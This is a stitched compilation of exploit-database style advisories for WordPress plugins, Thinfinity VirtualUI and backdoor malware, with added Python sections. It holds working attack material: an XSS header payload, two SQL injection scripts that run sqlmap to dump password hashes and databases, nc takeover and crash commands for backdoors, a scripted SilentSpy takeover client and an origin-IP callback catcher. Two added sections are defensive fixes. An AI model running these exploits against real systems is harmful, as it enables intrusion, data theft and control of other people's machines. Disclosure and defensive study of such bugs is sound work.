<pre><code>Hello, today I disclosed the CVE-2021-25080 vulnerability. Here attached<br />technical information:<br /><br /># References:<br />* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac<br />* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/<br /><br /><br /># Description:<br />The Contact Form Entries WordPress plugin before 1.1.7 does not sanitise or escape<br />the client IP address it takes from the HTTP_CLIENT_IP request header before storing<br />it and displaying it in the entries list, leading to a stored cross-site scripting<br />issue that fires when an administrator views the entry.<br /><br /><br /># Technical Details and Exploitation:<br />Contact Form Entries is vulnerable to a stored XSS in the Client IP field.<br />When a visitor submits a form, Contact Form Entries looks up the client IP<br />in order to save information about the submitter:<br />===============================================================================================================<br />public function get_ip(),<br />wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388<br />===============================================================================================================<br />get_ip() reads $_SERVER['HTTP_CLIENT_IP'], which PHP populates from the Client-IP<br />request header, so the client can set it to an arbitrary string, and that string<br />is stored in the database without validation or escaping.<br /><br /><br /># Proof Of Concept:<br /><br />Given a Contact Form 7 form, intercept the submission POST request and add<br />the following Client-IP header:<br />===============================================================================================================<br />POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1<br />Host: dsp.com:11080<br />Content-Length: 1411<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...<br />Client-IP: <img src=a onerror=alert(1)><br /><br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7"<br /><br />10<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_version"<br /><br />5.3.1<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_locale"<br /><br />en_US<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_unit_tag"<br /><br />wpcf7-f10-p13-o1<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_container_post"<br />...<br />===============================================================================================================<br />The request is accepted; get_ip() takes the $_SERVER['HTTP_CLIENT_IP'] branch and<br />the injected value is saved in the database. When the administrator opens the<br />entry in the plugin's admin page, the XSS is triggered.<br /><br /><br /># Solution:<br />Upgrade Contact Form Entries to version 1.1.7<br /><br /><br /></code></pre>
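The root cause above is an IP lookup that trusts whatever arrives in a client-supplied header and stores it verbatim. The following is an added example, not the plugin's code: `get_ip_vulnerable` models the header-priority pattern the advisory describes (HTTP_CLIENT_IP consulted first, value stored as-is; the exact order the plugin uses is an assumption), `get_ip_hardened` shows the two fixes a practitioner would want (only honour forwarding headers when the TCP peer is a proxy you operate, and only store something that parses as an IP address), and `render_entry_ip` shows the output encoding that would have stopped the payload even if it had been stored. The request dictionaries are constructed to look like PHP's `$_SERVER` for the PoC request.

```python
"""Client-IP resolution: the trusting pattern behind CVE-2021-25080 beside a hardened one."""
import html
import ipaddress

# Constructed: what $_SERVER looks like for the advisory's PoC request.
# Every HTTP_* key is attacker-controlled; REMOTE_ADDR comes from the TCP socket.
POC_REQUEST = {
    "REMOTE_ADDR": "203.0.113.7",
    "HTTP_CLIENT_IP": "<img src=a onerror=alert(1)>",
}

# Assumed lookup order; the advisory only states that HTTP_CLIENT_IP is consulted.
HEADER_ORDER = ("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "REMOTE_ADDR")


def get_ip_vulnerable(server):
    """First populated key wins and is returned untouched: this is what gets stored."""
    for key in HEADER_ORDER:
        if server.get(key):
            return server[key]
    return ""


def get_ip_hardened(server, trusted_proxies=frozenset()):
    """Only believe forwarding headers when the TCP peer is a proxy we operate,
    and only ever return something that parses as an IP address."""
    remote = server.get("REMOTE_ADDR", "")
    candidates = []
    if remote in trusted_proxies:
        # A proxy appends the client it saw, so the right-most X-Forwarded-For
        # entry is the only one it vouches for; Client-IP is treated the same way.
        xff = [p.strip() for p in server.get("HTTP_X_FORWARDED_FOR", "").split(",") if p.strip()]
        if xff:
            candidates.append(xff[-1])
        if server.get("HTTP_CLIENT_IP"):
            candidates.append(server["HTTP_CLIENT_IP"].strip())
    candidates.append(remote)
    for value in candidates:
        try:
            return str(ipaddress.ip_address(value))  # raises ValueError on anything that is not an IP
        except ValueError:
            continue
    return ""


def render_entry_ip(ip):
    """Output encoding at render time: the second, independent defence."""
    return f"<td>{html.escape(ip)}</td>"


if __name__ == "__main__":
    print("stored by the vulnerable lookup:", get_ip_vulnerable(POC_REQUEST))
    print("stored by the hardened lookup:  ", get_ip_hardened(POC_REQUEST))
    print("rendered with escaping:         ", render_entry_ip(get_ip_vulnerable(POC_REQUEST)))
```

Note that validation and escaping are independent: validation keeps the payload out of the database, escaping keeps it inert on the admin page, and the plugin needed at least one of them.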
<pre><code># Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)<br /># Date 18.02.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://www.getperfectsurvey.com/<br /># Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip<br /># Version: < 1.5.2<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-24762<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md<br /><br />'''<br />Description:<br />The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before<br />using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.<br />'''<br /><br />banner = '''<br /> <br /> ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____ <br /> _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____) <br />(_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_) <br />(_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_) <br />(_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___ <br /> (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______) <br /> <br /> <br /> [+] Perfect Survey - SQL Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br /><br />'''<br />print(banner)<br /><br />import argparse<br />from datetime import datetime<br />import os<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br 
/>target_port = args.PORT<br />wp_path = args.PATH<br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print('[*] Payload for SQL-Injection:')<br />exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a7ce38e60cf08f2b234f34043b87e701.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.SilentSpy.10<br />Vulnerability: Authentication Bypass Command Execution<br />Description: The malware listens on TCP ports 21 and 7007. Third-party attackers who can reach an infected system can change the server password on the fly with the !SETSERVPASS! command, which is accepted before any authentication, then log on with the new password and run the commands the malware exposes.<br />Type: PE32<br />MD5: a7ce38e60cf08f2b234f34043b87e701<br />Vuln ID: MVID-2021-0440<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 7007<br />!SETSERVPASS! abc123<br />!STATUS!Server password has been changed<br /><br />!PASS! abc123<br />!PASSOK!!STATUS!Connnected to º∩LΘn7 ºp<br /><br />!SYMBOL!<br />!STATUS!Symbol has been drawn<br /><br />!SETSERVNAME! HATE<br />!STATUS!Server name has been changed<br /><br />nc64.exe x.x.x.x 7007<br />!PASS! abc123<br />!PASSOK!!STATUS!Connnected to HATE<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
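The transcript above is typed into nc by hand. As an added example that is not part of the Malvuln advisory, the script below drives the same exchange from code: an unauthenticated `!SETSERVPASS!`, then `!PASS!` with the password just set, then `!SETSERVNAME!`. It assumes the channel is line-oriented (commands newline-terminated, as typed into nc) and that each reply arrives in one short read; both are assumptions. `FakeSilentSpy` is a constructed stand-in that answers with the replies seen in the transcript so the client can run offline; it is not the malware, and its replies for bad or unknown commands are invented.

```python
"""Drive the SilentSpy control channel: unauthenticated !SETSERVPASS!, then !PASS!."""
import socket
import threading


class FakeSilentSpy(threading.Thread):
    """Constructed model of the observed behaviour: !SETSERVPASS! is honoured
    before any authentication, which is the whole bug. Not the real malware."""

    def __init__(self, host="127.0.0.1"):
        super().__init__(daemon=True)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind((host, 0))          # ephemeral port, read it from .port
        self.listener.listen(1)
        self.port = self.listener.getsockname()[1]
        self.password = "unknown-to-attacker"  # whatever the operator configured
        self.server_name = "SERVER"

    def run(self):
        conn, _ = self.listener.accept()
        with conn:
            authed = False
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                cmd, _, arg = data.decode("latin-1").strip().partition(" ")
                if cmd == "!SETSERVPASS!":          # no authentication check at all
                    self.password = arg
                    conn.sendall(b"!STATUS!Server password has been changed")
                elif cmd == "!PASS!":
                    authed = arg == self.password
                    if authed:
                        conn.sendall(b"!PASSOK!!STATUS!Connected to " + self.server_name.encode("latin-1"))
                    else:
                        conn.sendall(b"!STATUS!Bad password")   # invented reply
                elif cmd == "!SETSERVNAME!" and authed:
                    self.server_name = arg
                    conn.sendall(b"!STATUS!Server name has been changed")
                else:
                    conn.sendall(b"!STATUS!Unknown or unauthorised command")  # invented reply
        self.listener.close()


def send_command(sock, line):
    """Send one command and return the reply text (assumption: one recv is enough)."""
    sock.sendall(line.encode("latin-1") + b"\n")
    return sock.recv(4096).decode("latin-1").strip()


def take_over(host, port, new_password, new_name=None, timeout=5.0):
    """Reset the server password without knowing the old one, then log in."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        replies.append(send_command(s, f"!SETSERVPASS! {new_password}"))
        replies.append(send_command(s, f"!PASS! {new_password}"))
        if new_name:
            replies.append(send_command(s, f"!SETSERVNAME! {new_name}"))
    return replies


def demo():
    """Run the exchange against the constructed stand-in on localhost."""
    fake = FakeSilentSpy()
    fake.start()
    return take_over("127.0.0.1", fake.port, "abc123", new_name="HATE")


if __name__ == "__main__":
    for reply in demo():
        print(reply)
```

Against a real infected host you would call `take_over(target, 7007, "abc123")`; the point the advisory makes is that the first reply comes back without any prior `!PASS!`.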
<pre><code># Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)<br /># Date 20.02.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://wedevs.com/<br /># Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip<br /># Version: < 3.5.26<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-25076<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md<br /><br />'''<br />Description:<br />The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter<br />before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection.<br />Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting<br />'''<br /><br />banner = '''<br /><br /> _|_|_| _| _| _|_|_|_| _|_| _| _|_| _| _|_| _|_|_|_| _| _|_|_|_|_| _|_|_| <br />_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _| <br />_| _| _| _|_|_| _|_|_|_|_| _| _| _| _| _| _|_|_|_|_| _| _|_|_| _| _| _| _|_|_| <br />_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| <br /> _|_|_| _| _|_|_|_| _|_|_|_| _| _|_|_|_| _| _|_|_|_| _|_|_| _| _| _|_| <br /> <br /> [+] WP User Frontend - SQL Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br />'''<br />print(banner)<br /><br />import argparse<br />from datetime import datetime<br />import os<br />import requests<br />import json<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description= 'WP User Frontend - SQL-Injection (Authenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br />my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = 
args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br /><br /><br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># SQL-Injection (Exploit):<br /># Generate payload for sqlmap<br />cookies_session = session.cookies.get_dict()<br />cookie = json.dumps(cookies_session)<br />cookie = cookie.replace('"}','')<br />cookie = cookie.replace('{"', '')<br />cookie = cookie.replace('"', '')<br />cookie = cookie.replace(" ", '')<br />cookie = cookie.replace(":", '=')<br />cookie = cookie.replace(',', '; ')<br />print('[*] Payload for SQL-Injection:')<br />exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" '<br />exploitcode_risk = '--level 2 --risk 2 '<br />exploitcode_cookie = '--cookie="' + cookie + '" '<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current 
database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/d724feed69ec7b624e4e178ad6579cfb.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Skrat<br />Vulnerability: Cleartext Hardcoded Password<br />Description: The SKD RAT builder produces backdoor server executables; when a password for remote access is set at build time, it is embedded in cleartext in the generated executable, so anyone with a copy of the built server can read it.<br />Type: PE32<br />MD5: d724feed69ec7b624e4e178ad6579cfb<br />Vuln ID: MVID-2021-0437<br />Dropped files: server.exe<br />Disclosure: 12/31/2021<br /></code></pre>
<pre><code>Exploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure<br />Date: 18/01/2022<br />Exploit Author: Daniel Morales<br />Vendor: https://www.cybelesoft.com<br />Software Link: https://www.cybelesoft.com/thinfinity/virtualui/<br />Version vulnerable: Thinfinity VirtualUI <= v2.5.26.2 (see tested versions below)<br />Tested on: Microsoft Windows<br />CVE: CVE-2021-46354<br /><br />How it works<br />External service interaction arises when an attacker can induce the application to open a connection to an arbitrary external host. Here the destAddr parameter of the connect command names the host the VirtualUI server connects to. An attacker who points destAddr at a host they control sees the connection arrive from the server's real IP address, which leaks the origin even when the site is fronted by a CDN; the same primitive also widens the attack surface, since the server can reach hosts the attacker cannot.<br /><br />Payload<br />An example HTTP request:<br />https://example.com/cmd?cmd=connect&wscompression=true&destAddr=domain.com&scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=1918&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supportsFullScreen=true&webapp=false<br /><br />Where "domain.com" is the external endpoint to be requested.<br /><br />Vulnerable versions<br />It has been tested in VirtualUI versions 2.1.28.0, 2.1.32.1 and 2.5.26.2.<br /><br />References<br />https://github.com/cybelesoft/virtualui/issues/3<br />https://www.tenable.com/cve/CVE-2021-46354<br />https://twitter.com/danielmofer<br /><br /></code></pre>
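To turn the external-service interaction into the origin-IP leak the advisory describes, you need two pieces: the trigger URL with destAddr pointed at a host you control, and a listener on that host that records who connects. The following is an added example, not code from the advisory or from Cybele Software. It copies the parameter set from the request above and changes only destAddr; which port the VirtualUI server connects to on destAddr is not stated in the advisory, so the catcher's port is simply a parameter. Nothing here contacts a VirtualUI server: `demo()` connects to the catcher from localhost as a stand-in for the callback.

```python
"""Catch the VirtualUI destAddr callback and record the source IP it arrives from."""
import socket
import threading
from urllib.parse import urlencode

# Parameter set copied from the advisory's request; only destAddr is changed per probe.
PROBE_PARAMS = {
    "cmd": "connect", "wscompression": "true", "scraper": "fmx",
    "screenWidth": "1918", "screenHeight": "934", "fitmode": "0", "argumentsp": "",
    "orientation": "0", "browserWidth": "1918", "browserHeight": "872",
    "supportCur": "true", "id": "null", "devicePixelRatio": "1", "isMobile": "false",
    "isLandscape": "true", "supportsFullScreen": "true", "webapp": "false",
}


def build_probe_url(base_url, listener_host):
    """URL that makes the VirtualUI host open a connection to listener_host."""
    params = dict(PROBE_PARAMS, destAddr=listener_host)
    return f"{base_url.rstrip('/')}/cmd?{urlencode(params)}"


class CallbackCatcher:
    """TCP listener that records the source address of every connection it receives.
    When the VirtualUI server calls back, that address is the origin's real IP."""

    def __init__(self, host="0.0.0.0", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.peers = []
        self._seen = threading.Event()
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, addr = self.sock.accept()
            except OSError:             # listener was closed
                return
            self.peers.append(addr[0])  # the only thing we need from the callback
            self._seen.set()
            conn.close()

    def wait(self, timeout):
        """Block until the first callback (or timeout) and return the peers seen so far."""
        self._seen.wait(timeout)
        return list(self.peers)

    def close(self):
        self.sock.close()


def demo():
    """Offline run: build the probe URL, then simulate the callback from localhost."""
    catcher = CallbackCatcher(host="127.0.0.1")
    url = build_probe_url("https://example.com", "127.0.0.1")   # in real use: your public host
    # Stand-in for the VirtualUI server following destAddr: a local connect.
    socket.create_connection(("127.0.0.1", catcher.port)).close()
    peers = catcher.wait(timeout=2.0)
    catcher.close()
    return url, peers


if __name__ == "__main__":
    probe_url, seen = demo()
    print("send the victim's browser or your own client to:", probe_url)
    print("callback arrived from:", seen)
```

In a real test the catcher runs on a public host, `build_probe_url` is given that host, and the IP that shows up in `peers` is compared with the CDN edge addresses the site resolves to.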
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a1d045151c809535a308311931588fd0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Fantador<br />Vulnerability: Divide by Zero DoS<br />Description: The malware lets the operator configure the port of its FTP server, so the port has to be known up front. Third-party attackers who can reach it can send a junk payload that triggers an integer divide-by-zero (div eax,ecx with ecx=0, see the context record below) and crashes the server.<br />Type: PE32<br />MD5: a1d045151c809535a308311931588fd0<br />Vuln ID: MVID-2021-0438<br />Disclosure: 12/31/2021<br /><br />Memory Dump:<br />(e80.6d0): Integer divide-by-zero - code c0000094 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000003 edi=00000003<br />eip=773ced3c esp=0019f1e0 ebp=0019f370 iopl=0 nv up ei pl nz ac po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />773ced3c c21400 ret 14h<br />0:000> .ecxr<br />eax=000001f4 ebx=00000000 ecx=00000000 edx=00000000 esi=041c18c8 edi=00000000<br />eip=0040ece7 esp=0019fb64 ebp=00000000 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br />Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+0xece7:<br />0040ece7 f7f1 div eax,ecx<br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br />Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br 
/>0040ece7 f7f1 div eax,ecx<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 0040ece7 (Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+0x0000ece7)<br /> ExceptionCode: c0000094 (Integer divide-by-zero)<br /> ExceptionFlags: 00000000<br />NumberParameters: 0<br /><br />PROCESS_NAME: Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000094 - {EXCEPTION} Integer division by zero.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000094 - {EXCEPTION} Integer division by zero.<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 000006d0<br /><br />DEFAULT_BUCKET_ID: STATUS_INTEGER_DIVIDE_BY_ZERO<br /><br />PRIMARY_PROBLEM_CLASS: STATUS_INTEGER_DIVIDE_BY_ZERO<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STATUS_INTEGER_DIVIDE_BY_ZERO<br /><br />LAST_CONTROL_TRANSFER: from 00000000 to 0040ece7<br /><br />STACK_TEXT: <br />00000000 00000000 00000000 00000000 00000000 Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+0xece7<br /><br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br />0040ece7 f7f1 div eax,ecx<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0<br /><br />IMAGE_NAME: Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3fe17f27<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb<br /><br />FAILURE_BUCKET_ID: STATUS_INTEGER_DIVIDE_BY_ZERO_c0000094_Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STATUS_INTEGER_DIVIDE_BY_ZERO_Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br /><br /><br 
/>Exploit/PoC:<br />python -c "print('A'*2839)" | nc64.exe x.x.x.x 21<br /></code></pre>
<pre><code>Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection<br />Date: 16/12/2021<br />Exploit Author: Daniel Morales<br />Vendor: https://www.cybelesoft.com<br />Software Link: https://www.cybelesoft.com/thinfinity/virtualui/<br />Version: Thinfinity VirtualUI < v3.0<br />Tested on: Microsoft Windows<br />CVE: CVE-2021-45092<br /><br />How it works<br />The vpath parameter of lab.html is used as the source of an iframe without being restricted to the application's own origin. A protocol-relative value such as //wikipedia.com resolves to an external host, so by sending a victim the URL below an attacker can frame any external site inside the VirtualUI page (only sites that allow being framed, i.e. that do not forbid it with X-Frame-Options or a CSP frame-ancestors directive).<br /><br />Payload<br />The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com", where "vpath=//" points to the external site to be framed.<br /><br />Vulnerable versions<br />It has been tested in VirtualUI versions 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.<br /><br />References<br />https://github.com/cybelesoft/virtualui/issues/2<br />https://www.tenable.com/cve/CVE-2021-45092<br />https://twitter.com/danielmofer<br /><br /></code></pre>
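The fix for this class of bug is to accept only a same-origin absolute path for vpath before using it as a frame source. The following is an added example, not VirtualUI code, of the check a server should apply; `APP_ORIGIN` is an assumed value for the origin that serves lab.html. It goes slightly beyond the advisory's `//host` case by also rejecting the variants browsers treat the same way: `/\host`, values with embedded tab or newline characters (which browsers strip before parsing), and absolute URLs.

```python
"""Reject vpath values that would frame an external site."""
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "https://example.com"   # assumption: the origin that serves lab.html


def normalise(vpath):
    """Apply the canonicalisation browsers do before parsing a URL: drop ASCII
    tab/newline anywhere and strip leading/trailing C0 controls and spaces."""
    vpath = "".join(ch for ch in vpath if ch not in "\t\r\n")
    return vpath.strip("".join(chr(c) for c in range(0x21)))


def is_safe_vpath(vpath):
    """True only for a same-origin absolute path such as /lab/index.html."""
    v = normalise(vpath or "")
    if not v.startswith("/"):
        return False                   # empty, relative, or an absolute URL (https://...)
    if v[1:2] in ("/", "\\"):
        return False                   # "//host" and "/\host" are protocol-relative
    if "\\" in v:
        return False                   # browsers turn backslashes into slashes
    parts = urlsplit(v)
    if parts.scheme or parts.netloc:
        return False
    # Belt and braces: resolving against our origin must not leave it.
    resolved = urlsplit(urljoin(APP_ORIGIN + "/", v))
    origin = urlsplit(APP_ORIGIN)
    return (resolved.scheme, resolved.netloc) == (origin.scheme, origin.netloc)


def iframe_src(vpath):
    """Absolute same-origin URL to use as the frame source, or None to refuse the request."""
    if not is_safe_vpath(vpath):
        return None
    return urljoin(APP_ORIGIN + "/", normalise(vpath))


if __name__ == "__main__":
    for candidate in ("/lab/index.html", "//wikipedia.com", "/\\evil.com", "/\t/evil.com", "https://evil.com/"):
        print(repr(candidate), "->", iframe_src(candidate))
```

The same check belongs in front of any redirect target or `src` attribute that a request parameter feeds; the protocol-relative form is the one most allow-lists forget.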
